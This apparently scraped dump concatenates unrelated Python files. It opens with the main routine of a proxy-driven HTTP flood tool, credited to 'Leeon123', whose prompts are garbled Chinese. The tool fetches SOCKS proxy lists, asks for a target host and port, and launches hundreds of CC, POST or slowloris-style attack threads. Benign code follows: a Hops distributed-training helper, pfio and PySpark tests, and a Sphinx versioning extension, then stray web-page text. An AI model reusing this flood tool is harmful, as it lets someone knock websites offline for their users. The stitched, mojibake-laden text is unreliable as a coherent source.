f.write(r.content)
f.close()
except:
f.close()
try:#credit to All3xJ
import urllib.request
req = urllib.request.Request("https://www.socks-proxy.net/")
req.add_header("User-Agent", getuseragent)
sourcecode = urllib.request.urlopen(req)
part = str(sourcecode.read())
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open("socks4.txt","a")
out_file.write(proxies)
out_file.close()
except:
pass
print("> Have already downloaded socks4 list as socks4.txt")
if choice == "5":
f = open("socks5.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all")
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5")
f.write(r.content)
f.close()
except:
f.close()
print("> Have already downloaded socks5 list as socks5.txt")
def main():
global ip
global url2
global port
global proxies
global multiple
global choice
global data
global mode2
global cookies
global brute
ip = ""
port = ""
mode = ""
print("> Mode: [cc/post/slow/check]")
while mode == "" :
mode = str(input("> ่ฏท้ๆฉๆปๅปๆจกๅผ (default=cc) :")).strip()
if mode == "":
mode = "cc"
elif(mode != "cc") and (mode != "post")and(mode != "slow" )and(mode !="check"):
print("> ่ฏท่พๅ
ฅๆญฃ็กฎ็ๆจกๅผ")
mode = ""
continue
ip = str(input("> Host/Ip:"))
if ip == "":
print("> ่ฏท่พๅ
ฅๆญฃ็กฎ็ไธปๆบๆip")
sys.exit(1)
if mode == "slow" or mode == "check":
pass
else:
url = str(input("> ่พๅ
ฅไฝ ่ฆๆปๅป็้กต้ข(default=/):"))
if url == "":
url2 = "/"
else:
url2 = url
port = str(input("> ๆปๅป็ซฏๅฃ(Https is 443):"))
if port == '':
port = int(80)
print("> ้ป่ฎค้ๆฉ็ซฏๅฃ 80\r\n> ๅทฒ้ๆฉ็ซฏๅฃ 80 ")
else:
port = int(port)
if str(port) == '443':
print("> [!] ๅฏ็จSSLๆจกๅผ")
if mode == "post":
mode2 = str(input("> ่ชๅฎไนๅๅธๆฐๆฎ๏ผ (y/n, default=n):")).strip()
if mode2 == "y":
data = open(input("> ่พๅ
ฅๆไปถ่ทฏๅพ:").strip()).readlines()
data = ' '.join([str(txt) for txt in data])
choice2 = str(input("> ่ชๅฎไน cookies? (y/n, default=n):")).strip()
if choice2 == "y":
cookies = str(input("่ฏท่พๅ
ฅ cookies:")).strip()
choice = ""
while choice == "":
choice = str(input("> ่ฏท้ๆฉsocksไปฃ็ ๆจกๅผ(4/5, default=5):")).strip()
if choice == "":
choice = "5"
if choice != "4" and choice != "5":
print("> [!] ้่ฏฏ้ๆฉ่ฏท้่ฏ")
choice = ""
if choice == "4":
socks_type = 4
else:
socks_type = 5
if mode == "check":
N = str(input("> ่ชๅจ่ทๅไปฃ็ๅ่กจๅฆ?(y/n,default=y):"))
if N == 'y' or N == "" :
downloadsocks(choice)
else:
pass
if choice == "4":
out_file = str(input("> Socks4 Proxy file path(socks4.txt):"))
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
elif choice == "5":
out_file = str(input("> Socks5 Proxy file path(socks5.txt):"))
if out_file == '':
out_file = str("socks5.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
print ("> Number Of Socks%s Proxies: %s" %(choice,len(proxies)))
time.sleep(0.03)
ans = str(input("> Do u need to check the socks list?(y/n, defualt=y):"))
if ans == "":
ans = "y"
if ans == "y":
ms = str(input("> Delay of socks(seconds, default=1):"))
if ms == "":
ms = int(1)
else :
try:
ms = int(ms)
except :
ms = float(ms)
check_socks(ms)
print("> End of process")
return
if mode == "slow":
thread_num = str(input("> Connections(default=400):"))
else:
thread_num = str(input("> ๆปๅป็บฟ็จ(default=400):"))
if thread_num == "":
thread_num = int(400)
else:
try:
thread_num = int(thread_num)
except:
sys.exit("Error thread number")
N = str(input("> ่ชๅจ่ทๅไปฃ็ๅ่กจๅฆ?(y/n,default=y):"))
if N == 'y' or N == "" :
downloadsocks(choice)
else:
pass
if choice == "4":
out_file = str(input("> Socks4 Proxy file path(socks4.txt):"))
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
elif choice == "5":
out_file = str(input("> Socks5 Proxy file path(socks5.txt):"))
if out_file == '':
out_file = str("socks5.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
print ("> Number Of Socks%s Proxies: %s" %(choice,len(proxies)))
time.sleep(0.03)
ans = str(input("> ไฝ ้่ฆๆฃๆฅไปฃ็ๅ่กจๅ?(y/n, defualt=y):"))
if ans == "":
ans = "y"
if ans == "y":
ms = str(input("> Delay of socks(seconds, default=1):"))
if ms == "":
ms = int(1)
else :
try:
ms = int(ms)
except :
ms = float(ms)
check_socks(ms)
if mode == "slow":
input("Press Enter to continue.")
th = threading.Thread(target=slow,args=(thread_num,socks_type,))
th.setDaemon(True)
th.start()
else:
multiple = str(input("> ่พๅ
ฅๆพๅคงๅๆฐ(default=100):"))
if multiple == "":
multiple = int(100)
else:
multiple = int(multiple)
brute = str(input("> ๅฏ็จๅขๅผบๆจกๅผ[ๆต่ฏ็](y/n, default=n):"))
if brute == "":
brute = False
elif brute == "y":
brute = True
elif brute == "n":
brute = False
input("ๆๅ่ฝฆ้ฎ็ปง็ปญ.")
if mode == "post":
for _ in range(thread_num):
th = threading.Thread(target = post,args=(socks_type,))
th.setDaemon(True)
th.start()
#print("Threads "+str(i+1)+" created")
elif mode == "cc":
for _ in range(thread_num):
th = threading.Thread(target = cc,args=(socks_type,))
th.setDaemon(True)
th.start()
#print("Threads "+str(i+1)+" created")
try:
while True:
pass
except KeyboardInterrupt:
sys.exit()
if __name__ == "__main__":
main()#Coded by Leeon123
|
allreduce.py | """
Utility functions to retrieve information about available services and setting up security for the Hops platform.
These utils facilitates development by hiding complexity for programs interacting with Hops services.
"""
import os
from hops import devices, tensorboard, hdfs
from hops.experiment_impl.util import experiment_utils
from hops import util
import pydoop.hdfs
import threading
import time
import socket
import json
from . import allreduce_reservation
def _run(sc, map_fun, run_id, local_logdir=False, name="no-name", evaluator=False):
"""
Args:
sc:
map_fun:
local_logdir:
name:
Returns:
"""
app_id = str(sc.applicationId)
num_executions = util.num_executors()
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(num_executions), num_executions)
#Make SparkUI intuitive by grouping jobs
sc.setJobGroup(os.environ['ML_ID'], "{} | CollectiveAllReduceStrategy - Distributed Training".format(name))
server = allreduce_reservation.Server(num_executions)
server_addr = server.start()
#Force execution on executor, since GPU is located on executor
nodeRDD.foreachPartition(_prepare_func(app_id, run_id, map_fun, local_logdir, server_addr, evaluator, util.num_executors()))
logdir = experiment_utils._get_logdir(app_id, run_id)
print('Finished Experiment \n')
path_to_return = logdir + '/.outputs.json'
if pydoop.hdfs.path.exists(path_to_return):
with pydoop.hdfs.open(path_to_return, "r") as fi:
contents = fi.read()
fi.close()
return logdir, json.loads(contents)
return logdir, None
def _prepare_func(app_id, run_id, map_fun, local_logdir, server_addr, evaluator, num_executors):
"""
Args:
app_id:
run_id:
map_fun:
local_logdir:
server_addr:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
iter:
Returns:
"""
for i in iter:
executor_num = i
experiment_utils._set_ml_id(app_id, run_id)
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
is_chief = False
logdir = None
tb_hdfs_path = None
try:
host = experiment_utils._get_ip_address()
tmp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmp_socket.bind(('', 0))
port = tmp_socket.getsockname()[1]
client = allreduce_reservation.Client(server_addr)
host_port = host + ":" + str(port)
client.register({"worker": host_port, "index": executor_num})
cluster = client.await_reservations()
tmp_socket.close()
client.close()
task_index = experiment_utils._find_index(host_port, cluster)
if task_index == -1:
cluster["task"] = {"type": "chief", "index": 0}
else:
cluster["task"] = {"type": "worker", "index": task_index}
evaluator_node = None
if evaluator:
last_worker_index = len(cluster["cluster"]["worker"])-1
evaluator_node = cluster["cluster"]["worker"][last_worker_index]
cluster["cluster"]["evaluator"] = [evaluator_node]
del cluster["cluster"]["worker"][last_worker_index]
if evaluator_node == host_port:
cluster["task"] = {"type": "evaluator", "index": 0}
print('TF_CONFIG: {} '.format(cluster))
if num_executors > 1:
os.environ["TF_CONFIG"] = json.dumps(cluster)
is_chief = (cluster["task"]["type"] == "chief")
is_evaluator = (cluster["task"]["type"] == "evaluator")
if is_chief:
logdir = experiment_utils._get_logdir(app_id, run_id)
tb_hdfs_path, tb_pid = tensorboard._register(logdir, logdir, executor_num, local_logdir=local_logdir)
elif is_evaluator:
logdir = experiment_utils._get_logdir(app_id, run_id)
tensorboard.events_logdir = logdir
logfile = experiment_utils._init_logger(experiment_utils._get_logdir(app_id, run_id), role=cluster["task"]["type"], index=cluster["task"]["index"])
print(devices._get_gpu_info())
print('-------------------------------------------------------')
print('Started running task')
task_start = time.time()
retval = map_fun()
if is_chief:
experiment_utils._handle_return_simple(retval, experiment_utils._get_logdir(app_id, run_id), logfile)
task_end = time.time()
time_str = 'Finished task - took ' + experiment_utils._time_diff(task_start, task_end)
print(time_str)
print('-------------------------------------------------------')
except:
raise
finally:
experiment_utils._cleanup(tensorboard, t)
return _wrapper_fun |
test_fs.py | # Test fs.FS compatibility
import contextlib
import multiprocessing as mp
import os
import tempfile
import pytest
from moto import mock_s3
from parameterized import parameterized
from pfio.testing import ZipForTest, randstring
from pfio.v2 import S3, Local, Zip, from_url, lazify, open_url
@contextlib.contextmanager
def gen_fs(target):
if target == "s3":
bucket = "test-dummy-bucket"
with S3(bucket, create_bucket=True) as s3:
yield s3
# s3.client.delete_bucket(bucket)
elif target == "local":
with tempfile.TemporaryDirectory() as d:
yield Local(d)
else:
raise RuntimeError()
@parameterized.expand(["s3", "local"])
@mock_s3
def test_smoke(target):
filename = randstring()
filename2 = randstring()
content = randstring(1024) + '\n' + randstring(234)
with gen_fs(target) as fs:
with fs.open(filename, 'w') as fp:
fp.write(content)
with fs.open(filename, 'r') as fp:
assert content == fp.read()
with fs.open(filename, 'r') as fp:
lines = fp.readlines()
print(type(fp))
assert 2 == len(lines)
assert 1025 == len(lines[0])
assert 234 == len(lines[1])
assert filename in list(fs.list())
fs.mkdir('d')
with fs.open('d/foo', 'w') as fp:
fp.write(content + content)
with fs.open('d/foo', 'r') as fp:
assert (content + content) == fp.read()
print('recursive:', list(fs.list(recursive=True)))
print('non-rec:', list(fs.list(recursive=False)))
assert filename in list(fs.list())
assert 2 == len(list(fs.list(recursive=False)))
assert 'd/' in list(fs.list(recursive=False))
assert 'foo' in list(fs.list('d/'))
st = fs.stat(filename)
assert len(content) == st.size
assert st.filename is not None
assert st.last_modified is not None
assert type(st.last_modified) == float
with fs.open(filename2, 'wb') as fp:
fp.write(content.encode())
with fs.open(filename2, 'rb') as fp:
buf2 = fp.read()
assert content == buf2.decode()
with fs.open(filename2, 'r') as fp:
buf3 = fp.read()
assert content == buf3
fs.remove(filename)
fs.remove(filename2)
assert not fs.exists(filename)
assert not fs.is_forked
subfs = fs.subfs('d')
assert subfs.exists('foo')
def test_from_url_force_type():
with from_url(".", force_type='file') as fs:
assert isinstance(fs, Local)
with pytest.raises(ValueError):
from_url(".", force_type='hdfs')
with pytest.raises(ValueError):
from_url(".", force_type='s3')
with pytest.raises(ValueError):
from_url(".", force_type='foobar')
with tempfile.TemporaryDirectory() as d:
zipfilename = os.path.join(d, "test.zip")
ZipForTest(zipfilename)
with from_url(zipfilename, force_type='zip') as fs:
assert isinstance(fs, Zip)
# Without forced type, try to open according to the suffix
with from_url(zipfilename) as fs:
assert isinstance(fs, Zip)
with pytest.raises(ValueError):
# In type 'file' is forced, target path should be a
# directory regardless of the suffix
from_url(zipfilename, force_type='file')
testfilename = os.path.join(d, "test.txt")
with open_url(testfilename, 'w') as fp:
fp.write('hello')
with open_url(testfilename, 'r', force_type='file') as fp:
assert 'hello' == fp.read()
with pytest.raises(ValueError):
with open_url(testfilename, 'r', force_type='hdfs'):
pass
with pytest.raises(IsADirectoryError):
with open_url(testfilename, 'r', force_type='zip'):
pass
@parameterized.expand(["s3", "local"])
@mock_s3
def test_seekeable_read(target):
filename = randstring()
content = b'0123456789'
with gen_fs(target) as fs:
with fs.open(filename, 'wb') as fp:
fp.write(content)
print(content)
for i, c in enumerate(content):
with fs.open(filename, 'rb') as fp:
fp.seek(i)
s = fp.read()
print(c, s)
assert c == s[0]
def test_recreate():
with tempfile.TemporaryDirectory() as d:
zipfilename = os.path.join(d, "test.zip")
z = ZipForTest(zipfilename)
barrier = mp.Barrier(1)
with lazify(lambda: from_url(zipfilename)) as f:
with f.open('file', 'rb') as fp:
content = fp.read()
assert content
assert z.content('file') == content
def func():
# accessing the shared container
with f.open('file', 'rb') as fp:
barrier.wait()
assert content == fp.read()
p = mp.Process(target=func)
p.start()
p.join(timeout=1)
assert p.exitcode == 0
|
test_worker.py | # -*- encoding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import threading
import time
import unittest
has_resource_module = True
try:
import resource
except ImportError:
has_resource_module = False
from py4j.protocol import Py4JJavaError
from pyspark import SparkConf, SparkContext
from pyspark.testing.utils import ReusedPySparkTestCase, PySparkTestCase, QuietTest, eventually
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, "w") as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
cnt = 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(" ")
try:
daemon_pid, worker_pid = map(int, data)
except ValueError:
# In case the value is not written yet.
cnt += 1
if cnt == 10:
raise
else:
break
time.sleep(1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise RuntimeError()
rdd = self.sc.parallelize(range(100), 1)
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_non_exception_error(self):
# SPARK-33339: Pyspark application will hang due to non Exception
def raise_system_exit(_):
raise SystemExit()
rdd = self.sc.parallelize(range(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_system_exit))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(range(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.is_alive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
def test_python_exception_non_hanging(self):
# SPARK-21045: exceptions with no ascii encoding shall not hanging PySpark.
try:
def f():
raise RuntimeError("exception with ไธญ and \xd6\xd0")
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
self.assertRegex(str(e), "exception with ไธญ")
class WorkerReuseTest(PySparkTestCase):
def test_reuse_worker_of_parallelize_range(self):
def check_reuse_worker_of_parallelize_range():
rdd = self.sc.parallelize(range(20), 8)
previous_pids = rdd.map(lambda x: os.getpid()).collect()
current_pids = rdd.map(lambda x: os.getpid()).collect()
for pid in current_pids:
self.assertTrue(pid in previous_pids)
return True
eventually(check_reuse_worker_of_parallelize_range, catch_assertions=True)
@unittest.skipIf(
not has_resource_module or sys.platform != "linux",
"Memory limit feature in Python worker is dependent on "
"Python's 'resource' module on Linux; however, not found or not on Linux.",
)
class WorkerMemoryTest(unittest.TestCase):
def setUp(self):
class_name = self.__class__.__name__
conf = SparkConf().set("spark.executor.pyspark.memory", "2g")
self.sc = SparkContext("local[4]", class_name, conf=conf)
def test_memory_limit(self):
rdd = self.sc.parallelize(range(1), 1)
def getrlimit():
return resource.getrlimit(resource.RLIMIT_AS)
actual = rdd.map(lambda _: getrlimit()).collect()
self.assertTrue(len(actual) == 1)
self.assertTrue(len(actual[0]) == 2)
[(soft_limit, hard_limit)] = actual
self.assertEqual(soft_limit, 2 * 1024 * 1024 * 1024)
self.assertEqual(hard_limit, 2 * 1024 * 1024 * 1024)
def tearDown(self):
self.sc.stop()
class WorkerSegfaultTest(ReusedPySparkTestCase):
@classmethod
def conf(cls):
_conf = super(WorkerSegfaultTest, cls).conf()
_conf.set("spark.python.worker.faulthandler.enabled", "true")
return _conf
def test_python_segfault(self):
try:
def f():
import ctypes
ctypes.string_at(0)
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
self.assertRegex(str(e), "Segmentation fault")
@unittest.skipIf(
"COVERAGE_PROCESS_START" in os.environ,
"Flaky with coverage enabled, skipping for now.",
)
class WorkerSegfaultNonDaemonTest(WorkerSegfaultTest):
@classmethod
def conf(cls):
_conf = super(WorkerSegfaultNonDaemonTest, cls).conf()
_conf.set("spark.python.use.daemon", "false")
return _conf
if __name__ == "__main__":
import unittest
from pyspark.tests.test_worker import * # noqa: F401
try:
import xmlrunner # type: ignore[import]
testRunner = xmlrunner.XMLTestRunner(output="target/test-reports", verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
sphinx_.py | """Interface with Sphinx."""
import datetime
import importlib
import logging
import multiprocessing
import os
from pathlib import Path
import sys
from sphinx import locale
from sphinx.cmd.build import build_main
from sphinx.builders.html import StandaloneHTMLBuilder
from sphinx.config import Config as SphinxConfig
from sphinx.errors import SphinxError
from sphinx.jinja2glue import SphinxFileSystemLoader
from sphinx.util.i18n import format_date
from sphinxcontrib.versioning.lib import Config, HandledError, TempDir
from sphinxcontrib.versioning.versions import Versions
SC_VERSIONING_VERSIONS = list() # Updated after forking.
STATIC_DIR = os.path.join(os.path.dirname(__file__), '_static')
class EventHandlers(object):
"""Hold Sphinx event handlers as static or class methods.
:ivar multiprocessing.queues.Queue ABORT_AFTER_READ: Communication channel to parent process.
:ivar bool BANNER_GREATEST_TAG: Banner URLs point to greatest/highest (semver) tag.
:ivar str BANNER_MAIN_VERSION: Banner URLs point to this remote name (from Versions.__getitem__()).
:ivar bool BANNER_RECENT_TAG: Banner URLs point to most recently committed tag.
:ivar str CURRENT_VERSION: Current version being built.
:ivar bool IS_ROOT: Value for context['scv_is_root'].
:ivar bool SHOW_BANNER: Display the banner.
:ivar sphinxcontrib.versioning.versions.Versions VERSIONS: Versions class instance.
"""
ABORT_AFTER_READ = None
BANNER_GREATEST_TAG = False
BANNER_MAIN_VERSION = None
BANNER_RECENT_TAG = False
CURRENT_VERSION = None
IS_ROOT = False
SHOW_BANNER = False
VERSIONS = None
@staticmethod
def builder_inited(app):
"""Update the Sphinx builder.
:param sphinx.application.Sphinx app: Sphinx application object.
"""
# Add this extension's _templates directory to Sphinx.
templates_dir = os.path.join(os.path.dirname(__file__), '_templates')
app.builder.templates.pathchain.insert(0, templates_dir)
app.builder.templates.loaders.insert(0, SphinxFileSystemLoader(templates_dir))
app.builder.templates.templatepathlen += 1
# Add versions.html to sidebar.
if '**' not in app.config.html_sidebars:
app.config.html_sidebars['**'] = ['localtoc.html', 'relations.html', 'sourcelink.html',
'searchbox.html', 'versions.html']
elif 'versions.html' not in app.config.html_sidebars['**']:
app.config.html_sidebars['**'].append('versions.html')
@classmethod
def env_updated(cls, app, env):
"""Abort Sphinx after initializing config and discovering all pages to build.
:param sphinx.application.Sphinx app: Sphinx application object.
:param sphinx.environment.BuildEnvironment env: Sphinx build environment.
"""
if cls.ABORT_AFTER_READ:
config = {n: getattr(app.config, n) for n in (a for a in dir(app.config) if a.startswith('scv_'))}
config['found_docs'] = tuple(str(d) for d in env.found_docs)
config['master_doc'] = str(app.config.master_doc)
cls.ABORT_AFTER_READ.put(config)
sys.exit(0)
@classmethod
def html_page_context(cls, app, pagename, templatename, context, doctree):
"""Update the Jinja2 HTML context, exposes the Versions class instance to it.
:param sphinx.application.Sphinx app: Sphinx application object.
:param str pagename: Name of the page being rendered (without .html or any file extension).
:param str templatename: Page name with .html.
:param dict context: Jinja2 HTML context.
:param docutils.nodes.document doctree: Tree of docutils nodes.
"""
assert templatename or doctree # Unused, for linting.
cls.VERSIONS.context = context
versions = cls.VERSIONS
this_remote = versions[cls.CURRENT_VERSION]
banner_main_remote = versions[cls.BANNER_MAIN_VERSION] if cls.SHOW_BANNER else None
# Update Jinja2 context.
context['bitbucket_version'] = cls.CURRENT_VERSION
context['current_version'] = cls.CURRENT_VERSION
context['github_version'] = cls.CURRENT_VERSION
context['html_theme'] = app.config.html_theme
context['scv_banner_greatest_tag'] = cls.BANNER_GREATEST_TAG
context['scv_banner_main_ref_is_branch'] = banner_main_remote['kind'] == 'heads' if cls.SHOW_BANNER else None
context['scv_banner_main_ref_is_tag'] = banner_main_remote['kind'] == 'tags' if cls.SHOW_BANNER else None
context['scv_banner_main_version'] = banner_main_remote['name'] if cls.SHOW_BANNER else None
context['scv_banner_recent_tag'] = cls.BANNER_RECENT_TAG
context['scv_is_branch'] = this_remote['kind'] == 'heads'
context['scv_is_greatest_tag'] = this_remote == versions.greatest_tag_remote
context['scv_is_recent_branch'] = this_remote == versions.recent_branch_remote
context['scv_is_recent_ref'] = this_remote == versions.recent_remote
context['scv_is_recent_tag'] = this_remote == versions.recent_tag_remote
context['scv_is_root'] = cls.IS_ROOT
context['scv_is_tag'] = this_remote['kind'] == 'tags'
context['scv_show_banner'] = cls.SHOW_BANNER
context['versions'] = versions
context['vhasdoc'] = versions.vhasdoc
context['vpathto'] = versions.vpathto
# Insert banner into body.
if cls.SHOW_BANNER and 'body' in context:
parsed = app.builder.templates.render('banner.html', context)
context['body'] = parsed + context['body']
# Handle overridden css_files.
css_files = context.setdefault('css_files', list())
if '_static/banner.css' not in css_files:
css_files.append('_static/banner.css')
# Handle overridden html_static_path.
if STATIC_DIR not in app.config.html_static_path:
app.config.html_static_path.append(STATIC_DIR)
# Reset last_updated with file's mtime (will be last git commit authored date).
if app.config.html_last_updated_fmt is not None:
file_path = app.env.doc2path(pagename)
if os.path.isfile(file_path):
lufmt = app.config.html_last_updated_fmt or getattr(locale, '_')('%b %d, %Y')
mtime = datetime.datetime.fromtimestamp(os.path.getmtime(file_path))
context['last_updated'] = format_date(lufmt, mtime, language=app.config.language, warn=app.warn)
class ConfigInject(SphinxConfig):
"""Inject this extension info self.extensions. Append after user's extensions."""
def __init__(self, *args):
"""Constructor."""
super(ConfigInject, self).__init__(*args)
self.extensions.append('sphinxcontrib.versioning.sphinx_')
def _build(argv, config, versions, current_name, is_root):
"""Build Sphinx docs via multiprocessing for isolation.
:param tuple argv: Arguments to pass to Sphinx.
:param sphinxcontrib.versioning.lib.Config config: Runtime configuration.
:param sphinxcontrib.versioning.versions.Versions versions: Versions class instance.
:param str current_name: The ref name of the current version being built.
:param bool is_root: Is this build in the web root?
"""
# Was unable to get this inject to work in python 3.6 sphinx 2+
# replaced with importlib jazz before build_main
# application.Config = ConfigInject
if config.show_banner:
EventHandlers.BANNER_GREATEST_TAG = config.banner_greatest_tag
EventHandlers.BANNER_MAIN_VERSION = config.banner_main_ref
EventHandlers.BANNER_RECENT_TAG = config.banner_recent_tag
EventHandlers.SHOW_BANNER = True
EventHandlers.CURRENT_VERSION = current_name
EventHandlers.IS_ROOT = is_root
EventHandlers.VERSIONS = versions
SC_VERSIONING_VERSIONS[:] = [p for r in versions.remotes for p in sorted(r.items()) if p[0] not in ('sha', 'date')]
if config.verbose > 1:
argv += ('-v',) * (config.verbose - 1)
if config.no_colors:
argv += ('-N',)
if config.overflow:
argv += config.overflow
# import extensions variable from conf.py from checked out version of code.
# if this extension isn't present override extensions in call to sphinx-build
# to include it along with any other extension present in conf
spec = importlib.util.spec_from_file_location('conf', Path(argv[0], 'conf.py'))
_conf = importlib.util.module_from_spec(spec)
spec.loader.exec_module(_conf)
extensions = _conf.extensions
if "sphinxcontrib.versioning" not in extensions:
extensions.append("sphinxcontrib.versioning")
argv += ("-D", f"extensions={','.join(extensions)}")
# kick of sphinx-build
result = build_main(argv)
if result != 0:
raise SphinxError
def _read_config(argv, config, current_name, queue):
"""Read the Sphinx config via multiprocessing for isolation.
:param tuple argv: Arguments to pass to Sphinx.
:param sphinxcontrib.versioning.lib.Config config: Runtime configuration.
:param str current_name: The ref name of the current version being built.
:param multiprocessing.queues.Queue queue: Communication channel to parent process.
"""
# Patch.
EventHandlers.ABORT_AFTER_READ = queue
# Run.
_build(argv, config, Versions(list()), current_name, False)
def build(source, target, versions, current_name, is_root):
"""Build Sphinx docs for one version. Includes Versions class instance with names/urls in the HTML context.
:raise HandledError: If sphinx-build fails. Will be logged before raising.
:param str source: Source directory to pass to sphinx-build.
:param str target: Destination directory to write documentation to (passed to sphinx-build).
:param sphinxcontrib.versioning.versions.Versions versions: Versions class instance.
:param str current_name: The ref name of the current version being built.
:param bool is_root: Is this build in the web root?
"""
log = logging.getLogger(__name__)
argv = (os.path.abspath(source), os.path.abspath(target))
config = Config.from_context()
log.debug('Running sphinx-build for %s with args: %s', current_name, str(argv))
child = multiprocessing.Process(target=_build, args=(argv, config, versions, current_name, is_root))
child.start()
child.join() # Block.
if child.exitcode != 0:
log.error('sphinx-build failed for branch/tag: %s', current_name)
raise HandledError
def read_config(source, current_name):
"""Read the Sphinx config for one version.
:raise HandledError: If sphinx-build fails. Will be logged before raising.
:param str source: Source directory to pass to sphinx-build.
:param str current_name: The ref name of the current version being built.
:return: Specific Sphinx config values.
:rtype: dict
"""
log = logging.getLogger(__name__)
queue = multiprocessing.Queue()
config = Config.from_context()
with TempDir() as temp_dir:
argv = (os.path.abspath(source), os.path.abspath(temp_dir))
log.debug('Running sphinx-build for config values with args: %s', str(argv))
child = multiprocessing.Process(target=_read_config, args=(argv, config, current_name, queue))
child.start()
child.join() # Block.
if child.exitcode != 0:
log.error('sphinx-build failed for branch/tag while reading config: %s', current_name)
raise HandledError
config = queue.get()
return config
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.